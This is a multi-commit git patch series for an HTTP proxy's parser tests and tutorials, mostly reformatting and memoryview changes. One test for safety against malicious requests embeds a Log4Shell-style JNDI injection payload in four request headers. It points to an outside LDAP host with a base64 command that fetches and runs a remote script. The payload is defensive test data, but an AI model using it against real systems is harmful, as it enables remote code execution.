parser.parse(self.protocol_handler.work.buffer[0].tobytes()) + parser.parse(self.protocol_handler.work.buffer[0]) self.assertEqual(parser.state, httpParserStates.COMPLETE) assert parser.code is not None self.assertEqual(int(parser.code), 200) diff --git a/tests/plugin/test_http_proxy_plugins.py b/tests/plugin/test_http_proxy_plugins.py index 5b9e30d12f..1f9d43da37 100644 --- a/tests/plugin/test_http_proxy_plugins.py +++ b/tests/plugin/test_http_proxy_plugins.py @@ -153,7 +153,7 @@ async def test_proposed_rest_api_plugin(self) -> None: self.mock_server_conn.assert_not_called() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( response.header(b'content-type'), @@ -246,7 +246,7 @@ async def test_filter_by_upstream_host_plugin(self) -> None: self.mock_server_conn.assert_not_called() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.I_AM_A_TEAPOT, reason=b'I\'m a tea pot', @@ -342,7 +342,7 @@ def closed() -> bool: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), @@ -379,7 +379,7 @@ async def test_filter_by_url_regex_plugin(self) -> None: await self.protocol_handler._run_once() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.NOT_FOUND, reason=b'Blocked', diff --git a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py index c738be674a..d48cccd335 100644 --- a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py +++ b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py @@ -259,7 +259,7 @@ async def test_man_in_the_middle_plugin(self) -> None: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), From 5da9b730554fda7f2e55405bdcbf67444b4dcde9 Mon Sep 17 00:00:00 2001 From: "pre-commit-ci[bot]" <66853113+pre-commit-ci[bot]@users.noreply.github.com> Date: Wed, 26 Jan 2022 12:52:11 +0000 Subject: [PATCH 2/5] [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see https://pre-commit.ci --- tests/http/parser/test_http_parser.py | 386 ++++++++++++++------------ 1 file changed, 215 insertions(+), 171 deletions(-) diff --git a/tests/http/parser/test_http_parser.py b/tests/http/parser/test_http_parser.py index 4acd21dd65..cd073db41a 100644 --- a/tests/http/parser/test_http_parser.py +++ b/tests/http/parser/test_http_parser.py @@ -42,18 +42,20 @@ def test_issue_398(self) -> None: self.assertEqual(p.code, b'200') self.assertEqual(p.reason, b'OK') self.assertEqual(p.state, httpParserStates.LINE_RCVD) - p.parse(memoryview( - b'CP=CAO PSA OUR' + CRLF + - b'Cache-Control:private,max-age=0;' + CRLF + - b'X-Frame-Options:SAMEORIGIN' + CRLF + - b'X-Content-Type-Options:nosniff' + CRLF + - b'X-XSS-Protection:1; mode=block' + CRLF + - b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + - b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + - b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + - b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + - b'', - )) + p.parse( + memoryview( + b'CP=CAO PSA OUR' + CRLF + + b'Cache-Control:private,max-age=0;' + CRLF + + b'X-Frame-Options:SAMEORIGIN' + CRLF + + b'X-Content-Type-Options:nosniff' + CRLF + + b'X-XSS-Protection:1; mode=block' + CRLF + + b'Content-Security-Policy:default-src \'self\' \'unsafe-inline\' \'unsafe-eval\'' + CRLF + + b'Strict-Transport-Security:max-age=2592000; includeSubdomains' + CRLF + + b'Set-Cookie: lang=eng; path=/;HttpOnly;' + CRLF + + b'Content-type:text/html;charset=UTF-8;' + CRLF + CRLF + + b'', + ), + ) self.assertEqual(p.body, b'') self.assertEqual(p.state, httpParserStates.RCVING_BODY) @@ -76,8 +78,11 @@ def test_urlparse_on_invalid_connect_request(self) -> None: self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_unicode_character_domain_connect(self) -> None: - self.parser.parse(memoryview( - bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'))) + self.parser.parse( + memoryview( + bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'), + ), + ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual(self.parser.host, bytes_('ççç.org')) self.assertEqual(self.parser.port, 443) @@ -85,27 +90,34 @@ def test_unicode_character_domain_connect(self) -> None: def test_invalid_ipv6_in_request_line(self) -> None: self.parser.parse( memoryview( - bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n')), + bytes_('CONNECT 2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF:443 HTTP/1.1\r\n'), + ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, memoryview(bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', - )), + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), + ), ) self.assertEqual(self.parser.port, 443) def test_valid_ipv6_in_request_line(self) -> None: self.parser.parse( - memoryview(bytes_( - 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', - )), + memoryview( + bytes_( + 'CONNECT [2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]:443 HTTP/1.1\r\n', + ), + ), ) self.assertTrue(self.parser.is_https_tunnel) self.assertEqual( - self.parser.host, memoryview(bytes_( - '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', - )), + self.parser.host, memoryview( + bytes_( + '[2001:db8:3333:4444:CCCC:DDDD:EEEE:FFFF]', + ), + ), ) self.assertEqual(self.parser.port, 443) @@ -323,12 +335,14 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_get_partial_parse2(self) -> None: - self.parser.parse(memoryview( - CRLF.join([ - b'GET http://localhost:8080 HTTP/1.1', - b'Host: ', - ]), - )) + self.parser.parse( + memoryview( + CRLF.join([ + b'GET http://localhost:8080 HTTP/1.1', + b'Host: ', + ]), + ), + ) self.assertEqual(self.parser.method, b'GET') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -410,14 +424,16 @@ def assert_state_change_with_crlf( self.assertEqual(self.parser.state, final_state) def test_post_partial_parse(self) -> None: - self.parser.parse(memoryview( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Length: 7', - b'Content-Type: application/x-www-form-urlencoded', - ]), - )) + self.parser.parse( + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Length: 7', + b'Content-Type: application/x-www-form-urlencoded', + ]), + ), + ) self.assertEqual(self.parser.method, b'POST') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -467,14 +483,16 @@ def test_request_parse_without_content_length(self) -> None: See https://github.com/abhinavsingh/py/issues/20 for details. """ - self.parser.parse(memoryview( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Type: application/x-www-form-urlencoded', - CRLF, - ]), - )) + self.parser.parse( + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Type: application/x-www-form-urlencoded', + CRLF, + ]), + ), + ) self.assertEqual(self.parser.method, b'POST') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -498,13 +516,15 @@ def test_response_parse_without_content_length(self) -> None: self.assertEqual(self.parser.code, b'200') self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(memoryview( - CRLF.join([ - b'Server: BaseHTTP/0.3 Python/2.7.10', - b'Date: Thu, 13 Dec 2018 16:24:09 GMT', - CRLF, - ]), - )) + self.parser.parse( + memoryview( + CRLF.join([ + b'Server: BaseHTTP/0.3 Python/2.7.10', + b'Date: Thu, 13 Dec 2018 16:24:09 GMT', + CRLF, + ]), + ), + ) self.assertEqual( self.parser.state, httpParserStates.COMPLETE, @@ -512,24 +532,26 @@ def test_response_parse_without_content_length(self) -> None: def test_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(memoryview( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n\r\n', - b'\n' + - b'301 Moved', - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', - ]), - )) + self.parser.parse( + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n\r\n', + b'\n' + + b'301 Moved', + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ]), + ), + ) self.assertEqual(self.parser.code, b'301') self.assertEqual(self.parser.reason, b'Moved Permanently') self.assertEqual(self.parser.version, b'HTTP/1.1') @@ -548,20 +570,22 @@ def test_response_parse(self) -> None: def test_response_partial_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(memoryview( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n', - ]), - )) + self.parser.parse( + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n', + ]), + ), + ) assert self.parser.headers self.assertEqual( self.parser.headers[b'x-frame-options'], @@ -576,40 +600,46 @@ def test_response_partial_parse(self) -> None: self.parser.state, httpParserStates.HEADERS_COMPLETE, ) - self.parser.parse(memoryview( - b'\n' + - b'301 Moved', - )) + self.parser.parse( + memoryview( + b'\n' + + b'301 Moved', + ), + ) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) - self.parser.parse(memoryview( - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', - )) + self.parser.parse( + memoryview( + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ), + ) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_chunked_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(memoryview( - b''.join([ - b'HTTP/1.1 200 OK\r\n', - b'Content-Type: application/json\r\n', - b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', - b'Server: gunicorn/0.16.1\r\n', - b'transfer-encoding: chunked\r\n', - b'Connection: keep-alive\r\n\r\n', - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), - )) + self.parser.parse( + memoryview( + b''.join([ + b'HTTP/1.1 200 OK\r\n', + b'Content-Type: application/json\r\n', + b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', + b'Server: gunicorn/0.16.1\r\n', + b'transfer-encoding: chunked\r\n', + b'Connection: keep-alive\r\n\r\n', + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), + ) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -651,17 +681,19 @@ def assert_pipeline_response(self, response: memoryview) -> None: self.assertEqual(parser.buffer, None) def test_chunked_request_parse(self) -> None: - self.parser.parse(memoryview( - build_http_request( - httpMethods.POST, - b'http://example.org/', - headers={ - b'Transfer-Encoding': b'chunked', - b'Content-Type': b'application/json', - }, - body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + self.parser.parse( + memoryview( + build_http_request( + httpMethods.POST, + b'http://example.org/', + headers={ + b'Transfer-Encoding': b'chunked', + b'Content-Type': b'application/json', + }, + body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + ), ), - )) + ) self.assertEqual(self.parser.body, b'{"key":"value"}') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual( @@ -677,39 +709,47 @@ def test_chunked_request_parse(self) -> None: ) def test_is_http_1_1_keep_alive(self) -> None: - self.parser.parse(memoryview( - build_http_request( - httpMethods.GET, b'/', + self.parser.parse( + memoryview( + build_http_request( + httpMethods.GET, b'/', + ), ), - )) + ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_http_1_1_keep_alive_with_non_close_connection_header(self) -> None: - self.parser.parse(memoryview( - build_http_request( - httpMethods.GET, b'/', - headers={ - b'Connection': b'keep-alive', - }, + self.parser.parse( + memoryview( + build_http_request( + httpMethods.GET, b'/', + headers={ + b'Connection': b'keep-alive', + }, + ), ), - )) + ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_with_close_header(self) -> None: - self.parser.parse(memoryview( - build_http_request( - httpMethods.GET, b'/', - conn_close=True, + self.parser.parse( + memoryview( + build_http_request( + httpMethods.GET, b'/', + conn_close=True, + ), ), - )) + ) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_for_http_1_0(self) -> None: - self.parser.parse(memoryview( - build_http_request( - httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + self.parser.parse( + memoryview( + build_http_request( + httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + ), ), - )) + ) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_paramiko_doc(self) -> None: @@ -769,24 +809,26 @@ def test_proxy_protocol_not_for_response_parser(self) -> None: ) def test_is_safe_against_malicious_requests(self) -> None: - self.parser.parse(memoryview( - b'GET / HTTP/1.1\r\n' + - b'Host: 34.131.9.210:443\r\n' + - b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Content-Type: application/x-www-form-urlencoded\r\n' + - b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + - b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + - b'\r\n\r\n', - )) + self.parser.parse( + memoryview( + b'GET / HTTP/1.1\r\n' + + b'Host: 34.131.9.210:443\r\n' + + b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Content-Type: application/x-www-form-urlencoded\r\n' + + b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + + b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + + b'\r\n\r\n', + ), + ) self.assertEqual( self.parser.header(b'user-agent'), b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + @@ -849,15 +891,17 @@ def test_cannot_parse_sip_protocol(self) -> None: # Will fail to parse because of invalid host and port in the request line # Our Url parser expects an integer port. with self.assertRaises(ValueError): - self.parser.parse(memoryview( - b'OPTIONS sip:nm SIP/2.0\r\n' + - b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + - b'From: ;tag=root\r\nTo: \r\n' + - b'Call-ID: 50000\r\n' + - b'CSeq: 42 OPTIONS\r\n' + - b'Max-Forwards: 70\r\n' + - b'Content-Length: 0\r\n' + - b'Contact: \r\n' + - b'Accept: application/sdp\r\n' + - b'\r\n', - )) + self.parser.parse( + memoryview( + b'OPTIONS sip:nm SIP/2.0\r\n' + + b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + + b'From: ;tag=root\r\nTo: \r\n' + + b'Call-ID: 50000\r\n' + + b'CSeq: 42 OPTIONS\r\n' + + b'Max-Forwards: 70\r\n' + + b'Content-Length: 0\r\n' + + b'Contact: \r\n' + + b'Accept: application/sdp\r\n' + + b'\r\n', + ), + ) From 1730197cb1f82b2b14d8e942d7464d59081449a5 Mon Sep 17 00:00:00 2001 From: Abhinav Singh Date: Wed, 26 Jan 2022 18:35:12 +0530 Subject: [PATCH 3/5] Fix chunk parser --- tests/http/parser/test_chunk_parser.py | 18 +++++++++--------- tutorial/connections.ipynb | 6 +++--- tutorial/responses.ipynb | 8 ++++---- 3 files changed, 16 insertions(+), 16 deletions(-) diff --git a/tests/http/parser/test_chunk_parser.py b/tests/http/parser/test_chunk_parser.py index 1fde17256a..c25b1fd67d 100644 --- a/tests/http/parser/test_chunk_parser.py +++ b/tests/http/parser/test_chunk_parser.py @@ -19,7 +19,7 @@ def setUp(self) -> None: self.parser = ChunkParser() def test_chunk_parse_basic(self) -> None: - self.parser.parse( + self.parser.parse(memoryview( b''.join([ b'4\r\n', b'Wiki\r\n', @@ -30,7 +30,7 @@ def test_chunk_parse_basic(self) -> None: b'0\r\n', b'\r\n', ]), - ) + )) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') @@ -38,7 +38,7 @@ def test_chunk_parse_basic(self) -> None: def test_chunk_parse_issue_27(self) -> None: """Case when data ends with the chunk size but without ending CRLF.""" - self.parser.parse(b'3') + self.parser.parse(memoryview(b'3')) self.assertEqual(self.parser.chunk, b'3') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'') @@ -46,7 +46,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 3) self.assertEqual(self.parser.body, b'') @@ -54,7 +54,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'abc') + self.parser.parse(memoryview(b'abc')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -62,7 +62,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(b'\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abc') @@ -70,7 +70,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'4\r\n') + self.parser.parse(memoryview(b'4\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, 4) self.assertEqual(self.parser.body, b'abc') @@ -78,7 +78,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_DATA, ) - self.parser.parse(b'defg\r\n0') + self.parser.parse(memoryview(b'defg\r\n0')) self.assertEqual(self.parser.chunk, b'0') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') @@ -86,7 +86,7 @@ def test_chunk_parse_issue_27(self) -> None: self.parser.state, chunkParserStates.WAITING_FOR_SIZE, ) - self.parser.parse(b'\r\n\r\n') + self.parser.parse(memoryview(b'\r\n\r\n')) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'abcdefg') diff --git a/tutorial/connections.ipynb b/tutorial/connections.ipynb index 80bc82d2d8..f2f52391a6 100644 --- a/tutorial/connections.ipynb +++ b/tutorial/connections.ipynb @@ -17,7 +17,7 @@ }, { "cell_type": "code", - "execution_count": 3, + "execution_count": 1, "metadata": {}, "outputs": [], "source": [ @@ -55,7 +55,7 @@ "\n", "http_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n", "while not http_response.is_complete:\n", - " http_response.parse(http_client.recv().tobytes())\n", + " http_response.parse(http_client.recv())\n", "http_client.close()\n", "\n", "print(http_response.build_response())\n", @@ -89,7 +89,7 @@ "\n", "https_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n", "while not https_response.is_complete:\n", - " https_response.parse(https_client.recv().tobytes())\n", + " https_response.parse(https_client.recv())\n", "https_client.close()\n", "\n", "print(https_response.build_response())\n", diff --git a/tutorial/responses.ipynb b/tutorial/responses.ipynb index 11a7a6c5f1..7b8de55120 100644 --- a/tutorial/responses.ipynb +++ b/tutorial/responses.ipynb @@ -15,7 +15,7 @@ }, { "cell_type": "code", - "execution_count": 1, + "execution_count": 2, "metadata": {}, "outputs": [ { @@ -49,7 +49,7 @@ }, { "cell_type": "code", - "execution_count": 2, + "execution_count": 4, "metadata": {}, "outputs": [ { @@ -77,7 +77,7 @@ }, { "cell_type": "code", - "execution_count": 14, + "execution_count": 5, "metadata": {}, "outputs": [ { @@ -107,7 +107,7 @@ }, { "cell_type": "code", - "execution_count": 15, + "execution_count": 6, "metadata": {}, "outputs": [ { From c8540536639495de4489cb77327cec6980c7f8fa Mon Sep 17 00:00:00 2001 From: "pre-commit-ci[bot]" <66853113+pre-commit-ci[bot]@users.noreply.github.com> Date: Wed, 26 Jan 2022 13:06:56 +0000 Subject: [PATCH 4/5] [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see https://pre-commit.ci --- tests/http/parser/test_chunk_parser.py | 26 ++++++++++++++------------ 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/tests/http/parser/test_chunk_parser.py b/tests/http/parser/test_chunk_parser.py index c25b1fd67d..5df67264f1 100644 --- a/tests/http/parser/test_chunk_parser.py +++ b/tests/http/parser/test_chunk_parser.py @@ -19,18 +19,20 @@ def setUp(self) -> None: self.parser = ChunkParser() def test_chunk_parse_basic(self) -> None: - self.parser.parse(memoryview( - b''.join([ - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), - )) + self.parser.parse( + memoryview( + b''.join([ + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), + ) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') From 999f08a02f8351c2095343d316a6283e885e2c13 Mon Sep 17 00:00:00 2001 From: Abhinav Singh Date: Wed, 26 Jan 2022 18:50:57 +0530 Subject: [PATCH 5/5] Lint fixes --- proxy/http/parser/parser.py | 3 +-- tests/http/parser/test_chunk_parser.py | 26 ++++++++++++++------------ tests/http/parser/test_http_parser.py | 2 +- 3 files changed, 16 insertions(+), 15 deletions(-) diff --git a/proxy/http/parser/parser.py b/proxy/http/parser/parser.py index 42c7f8f74a..7d29f76e40 100644 --- a/proxy/http/parser/parser.py +++ b/proxy/http/parser/parser.py @@ -315,8 +315,7 @@ def _process_body(self, raw: memoryview) -> Tuple[bool, memoryview]: if self.body and \ len(self.body) == int(self.header(b'content-length')): self.state = httpParserStates.COMPLETE - more, raw = len(raw) > 0, raw[total_size - received_size:] - return more, raw + return len(raw) > 0, raw[total_size - received_size:] # Received a packet without content-length header # and no transfer-encoding specified. # diff --git a/tests/http/parser/test_chunk_parser.py b/tests/http/parser/test_chunk_parser.py index c25b1fd67d..5df67264f1 100644 --- a/tests/http/parser/test_chunk_parser.py +++ b/tests/http/parser/test_chunk_parser.py @@ -19,18 +19,20 @@ def setUp(self) -> None: self.parser = ChunkParser() def test_chunk_parse_basic(self) -> None: - self.parser.parse(memoryview( - b''.join([ - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), - )) + self.parser.parse( + memoryview( + b''.join([ + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), + ) self.assertEqual(self.parser.chunk, b'') self.assertEqual(self.parser.size, None) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') diff --git a/tests/http/parser/test_http_parser.py b/tests/http/parser/test_http_parser.py index cd073db41a..95c052dec4 100644 --- a/tests/http/parser/test_http_parser.py +++ b/tests/http/parser/test_http_parser.py @@ -80,7 +80,7 @@ def test_urlparse_on_invalid_connect_request(self) -> None: def test_unicode_character_domain_connect(self) -> None: self.parser.parse( memoryview( - bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'), + bytes_('CONNECT ççç.org:443 HTTP/1.1\r\n'), ), ) self.assertTrue(self.parser.is_https_tunnel)